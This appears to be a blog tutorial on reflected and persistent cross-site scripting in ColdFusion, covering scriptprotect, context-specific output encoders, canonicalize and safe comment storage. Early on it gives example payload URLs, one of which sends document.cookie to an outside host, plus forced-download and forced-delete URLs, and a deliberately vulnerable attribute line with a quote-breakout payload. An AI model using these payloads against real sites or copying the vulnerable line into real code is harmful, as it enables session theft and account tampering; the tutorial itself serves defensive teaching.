Web security is one of my favorite topics. Though I'm not an expert in web security, I want to share what I have learned so that it helps someone who is just starting with this topic.
Following are the most common security vulnerabilities we generally face in our web applications.
Out of the vulnerabilities listed above, XSS attacks have a huge share of 84%. So, let's start with XSS attacks.
Non-Persistent XSS Attack:
In this type of attack the malicious script is not stored anywhere; the attacker passes it in a URL or a form submission so that the page reflects it back, and uses that to deface the website.
A question arises: if the attacker passes that script and only sees some error message, how does it affect a real user or the application?
Suppose the attacker manages to deliver the crafted URL to a user by email or any other medium, and the user clicks on it. Then the user may face the following problems.
Let's say we have a page called index.cfm with the following code:
<cfoutput>#url.name#</cfoutput>
This simply displays the value of the "name" parameter passed in the URL scope, with no encoding at all.
All the examples below were tested in Firefox 26.0.
The attacker can steal the user's session cookie and take over their login (unless the cookie is flagged HttpOnly, in which case document.cookie cannot read it):
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://www.google.com?cookie=' %2B document.cookie"></body>
The attacker can make the user's browser download a file, such as an executable, onto the user's computer:
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="document.location='https://docs.google.com/uc?export=download%26id=0B2GDR5_Jv000OW9pSEZhaGZhQ1k'"></body>
Here I am downloading one of my own zip files, so don't worry for now :)
The attacker can delete a resource from the user's account, because the forced request carries the user's own cookies:
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://localhost:8500/xsstesting/deleteResource.cfm'"></body>
Suppose there is a page called "deleteResource.cfm" which deletes a particular resource; then the attacker can make the logged-in user delete that resource without knowing it.
A similar attack can be mounted through a form submission, since values from the FORM scope are output in the same way.
Let's see how we can protect ourselves from such attacks.
1. Use the following setting in Application.cfc:
this.scriptprotect = "all";
This saves us from basic XSS attacks. If someone tries to execute a script tag directly, like: http://localhost:8500/xsstesting/index.cfm?name=<script type="text/javascript">alert('Hello');</script> then you will see in the output:
<InvalidTag type="text/javascript">alert('Hello');</script>
So the script never executes in the browser, but this does not protect against a payload like the one we passed in the body tag, or one hidden in an anchor tag. When script protection is enabled in Application.cfc, ColdFusion scans the variables of the protected scopes ("all" covers URL, Form, Cookie and CGI) and, if it finds a tag that matches one of its patterns, rewrites the tag name to "InvalidTag". The tags ColdFusion protects against are listed in:
\{CF-Directory}\cfusion\lib\neo-security.xml under CrossSiteScriptPatterns. If you want to protect against additional tags you can add them there; you have to restart the CF server after making the change. Keep in mind that this is a pattern blacklist: anything that does not match a listed pattern (an onload or onerror attribute, for example) passes through untouched, so treat it as a backstop rather than a substitute for output encoding.
2. Use a secure output-encoding function when displaying the data to the user, like below:
<cfoutput>#htmlEditFormat(url.name)#</cfoutput>
Note that HTMLEditFormat only encodes <, >, & and the double quote; it leaves the single quote alone, so it is not safe inside a single-quoted attribute. On ColdFusion 10 and later prefer the EncodeFor* functions, which are built for specific output contexts.
What other secure output-encoding functions are available? Choose the one for the context the value is written into:

| Version | Context of use | Function | Example |
|---------|----------------|----------|---------|
| CF9 | HTML body | HTMLEditFormat | <cfoutput>#HTMLEditFormat(url.name)#</cfoutput> |
| CF9 | URL string | URLEncodedFormat | <a href="./dispUserList?name=#URLEncodedFormat(url.name)#">User List</a> |
| CF10 | HTML body | EncodeForHTML | <cfoutput>#EncodeForHTML(url.name)#</cfoutput> |
| CF10 | HTML attribute | EncodeForHTMLAttribute | <div class="#EncodeForHTMLAttribute(url.name)#">...</div> |
| CF10 | JavaScript | EncodeForJavaScript | <script>var name = "#EncodeForJavaScript(url.name)#";</script> |
| CF10 | CSS | EncodeForCSS | <style>body{background-color:#EncodeForCSS(url.color)#;}</style> |
| CF10 | URL | EncodeForURL | <a href="./dispUserList?name=#EncodeForURL(url.name)#">User List</a> |
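Putting the table to work: the test page below is an added example written for this post, not code from the original article. It assumes a ColdFusion 10 or later server and a request such as index.cfm?name=...&color=...; the parameter names and the surrounding markup are hypothetical. Each user-controlled value is encoded with the function for the context it lands in, and one deliberately vulnerable line shows why HTMLEditFormat is not enough for attributes.

```cfml
<!--- Added example (not from the original post). Assumes CF10+ and a request such as
      index.cfm?name=...&color=...; the parameter names and markup are hypothetical. --->
<cfparam name="url.name"  default="World">
<cfparam name="url.color" default="white">

<cfoutput>
<!--- HTML body: EncodeForHTML escapes <, >, &, both quote characters and anything
      else that could start a tag or entity, so a reflected payload renders as text. --->
<p>Hello #EncodeForHTML(url.name)#</p>

<!--- HTML attribute. HTMLEditFormat only touches < > & and the double quote, so with
      ?name=' onmouseover='alert(1) the single-quoted attribute below breaks out.
      This line is deliberately vulnerable and is kept only to show the gap. --->
<div title='#HTMLEditFormat(url.name)#'>HTMLEditFormat in a single-quoted attribute</div>
<!--- EncodeForHTMLAttribute encodes the single quote as well, so the same input stays inert. --->
<div title='#EncodeForHTMLAttribute(url.name)#'>EncodeForHTMLAttribute</div>

<!--- JavaScript string literal: encode for JS and keep the value inside quotes.
      Only data belongs here; never build code from a user value. --->
<script>
    var name = "#EncodeForJavaScript(url.name)#";
    document.title = "Hello " + name;
</script>

<!--- CSS property value: EncodeForCSS escapes characters that could end the
      declaration or close the style block. --->
<style>
    body { background-color: #EncodeForCSS(url.color)#; }
</style>

<!--- URL query parameter: EncodeForURL before the value is spliced into a link.
      The link target itself is a fixed relative path, not user input. --->
<a href="dispUserList.cfm?name=#EncodeForURL(url.name)#">User list</a>
</cfoutput>
```

Request the page with name=' onmouseover='alert(1) and hover over the two div elements: the HTMLEditFormat one fires, the EncodeForHTMLAttribute one does not. The rule the page demonstrates is that the encoder is chosen by where the value is written, not by where it came from.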
We have already applied some security measures, so you think you are safe now. No!!!
Why? In the examples above the script was passed as plain text in most cases, so the output-encoding functions convert it into a display-safe string and display it. But someone can also pass the string in one of the other encodings that most browsers support.
Example:
There are many ways to represent a string if we are using UTF-8 encoding in our web page.
Let's say, in how many ways can I represent the string "<script>"?
<script> : the literal characters
&lt;script&gt; : the same tag written as HTML entities
%26lt;script%26gt; : those entities URL-encoded, so the server's URL decoding turns them back into &lt;script&gt;
Similarly we can replace the characters of "script" by their hex codes (%3Cscript%3E in a URL, &#x3C;script&#x3E; as entities) and mix encodings to form the string. An output encoder never needs to detect any of this: as long as the value goes through EncodeForHTML at display time, &lt;script&gt; becomes &amp;lt;script&amp;gt; on the wire and the browser shows it as plain text. The danger is in whatever looks at the value before it is encoded. A pattern filter such as scriptprotect looks for a literal <script and does not match the entity form, and any later step that decodes the value a second time turns it back into a live tag.
The question comes: what do we do now?
First decode the user input back to its plain-text form (canonicalize it), then run any validation, and only then pass the result to the output-encoding function. See the below example.
I have added a new function called "sanitizeScope" in Application.cfc. It decodes all variables in a particular scope if you pass that scope as an argument. In onRequestStart() I call that function to decode all variables in the URL scope, and after that I can use the output-encoding functions safely.
In the above example I have used a new function, "canonicalize", which was added in ColdFusion 10 and decodes a string through every encoding it recognizes. Its restrictMultiple and restrictMixed arguments let you refuse input that is encoded more than once or that mixes encodings, which legitimate users never send.
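The post's own sanitizeScope() listing is not reproduced above, so the following is my reconstruction of that approach as an added example, not the author's code. It assumes ColdFusion 10 or later (for canonicalize) and reuses the application name "xsstesting" from the URLs in this post; the decision to clean both the URL and FORM scopes is mine.

```cfml
// Added example, not the post's own code (which is not reproduced above): a reconstruction
// of the sanitizeScope() approach for Application.cfc. Assumes ColdFusion 10 or later
// (canonicalize) and the application name "xsstesting" used in the URLs in this post.
component {

    this.name          = "xsstesting";
    this.scriptProtect = "all";   // the pattern-based backstop from section 1

    public boolean function onRequestStart(required string targetPage) {
        // Canonicalize reflected input before any code validates, filters or encodes it,
        // so that %26lt;script%26gt; and friends are seen as the <script> they really are.
        sanitizeScope(url);
        sanitizeScope(form);
        return true;
    }

    /**
     * Decodes every simple value in the given scope, in place. Structs are passed by
     * reference in CFML, so writing back to arguments.scope updates the real url/form
     * scope. Non-simple members (for example uploaded-file structs) are left alone.
     */
    private void function sanitizeScope(required struct scope) {
        for (var key in arguments.scope) {
            if (isSimpleValue(arguments.scope[key])) {
                // restrictMultiple=false, restrictMixed=false: decode through every layer.
                // Passing true for either flag instead restricts double- or mixed-encoded
                // input, which no legitimate user sends; check the canonicalize() docs for
                // how your CF version reports that case before relying on it.
                arguments.scope[key] = canonicalize(arguments.scope[key], false, false);
            }
        }
    }
}
```

Canonicalization does not replace the encoders in the page; it only guarantees that scriptprotect, any validation you write, and EncodeForHTML all see one representation of the input instead of a layered one.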
So far we have covered the basic non-persistent XSS attack and how to avoid it. Hope you have enjoyed it!!!
Persistent XSS Attack
In the previous section we learned what a non-persistent XSS attack is and how to restrict it. Now, let's start with the persistent XSS attack. This type of attack is the most dangerous for an application, as it keeps affecting the application until the malicious script is removed.
A persistent XSS attack means the malicious script is permanently stored in our application. Let's say an attacker has added a malicious script to a comment on a blog post; every time the blog post loads it will load that script, and the attacker can do whatever he wants with your application in the browser of every visitor who reads the post.
Find the example here:
http://coldfusion-tip.blogspot.in/2013/12/examples-of-xss-attack.html
How can we prevent such an attack?
Use the "sanitizeScope" method described in the previous section (or call "canonicalize" directly on any input entered by the user), then apply the output-encoding functions available in your version of ColdFusion when displaying the user input.
You could also apply the encoding before saving the data into the database, so that you do not have to call the encoding function every time the data is displayed. The safer default, though, is to store the user input unchanged and encode it at display time: the same stored value may later be rendered in an HTML body, an attribute, a JavaScript block or a JSON response, and each of those needs a different encoder, so data that was encoded for one context on the way in is either displayed wrongly or double-encoded in the others.
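The display-side approach in practice, as an added example that is my own code and not from the post: a hypothetical comment page that stores the visitor's text unchanged and encodes it only when rendering. It assumes a datasource named "blog" with a table comments(id, author, body), a file name of comments.cfm, and that Application.cfc canonicalizes the form scope as in the previous section.

```cfml
<!--- Added example (not from the original post). Hypothetical comment page: assumes a
      datasource "blog", a table comments(id, author, body), and the sanitizeScope()
      canonicalization of the form scope from the previous section. --->
<cfif structKeyExists(form, "author") AND structKeyExists(form, "body")>
    <!--- Store the text exactly as submitted. cfqueryparam keeps it out of the SQL
          grammar; no HTML encoding here, because the same row may later be rendered
          as HTML, placed in a JSON API response, or sent in a plain-text email. --->
    <cfquery datasource="blog">
        INSERT INTO comments (author, body)
        VALUES (
            <cfqueryparam value="#left(form.author, 50)#" cfsqltype="cf_sql_varchar">,
            <cfqueryparam value="#left(form.body, 2000)#" cfsqltype="cf_sql_varchar">
        )
    </cfquery>
</cfif>

<cfquery name="qComments" datasource="blog">
    SELECT id, author, body FROM comments ORDER BY id DESC
</cfquery>

<!--- Encode at render time, with the encoder for each context. A stored
      <script> or <img onerror=...> in body comes out as inert text. --->
<cfoutput query="qComments">
    <div class="comment" id="comment-#id#" data-author="#EncodeForHTMLAttribute(author)#">
        <strong>#EncodeForHTML(author)#</strong>
        <p>#EncodeForHTML(body)#</p>
    </div>
</cfoutput>

<form method="post" action="comments.cfm">
    <input name="author" maxlength="50">
    <textarea name="body" maxlength="2000"></textarea>
    <button type="submit">Post comment</button>
</form>
```

Post a comment whose body is <script>alert(document.cookie)</script> and reload: the row is stored verbatim, and the page shows the tag as text because the only path from the database to the browser runs through EncodeForHTML.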
We have covered all the basic XSS prevention methods available in ColdFusion. In the next post on XSS attacks we will look at some advanced concepts.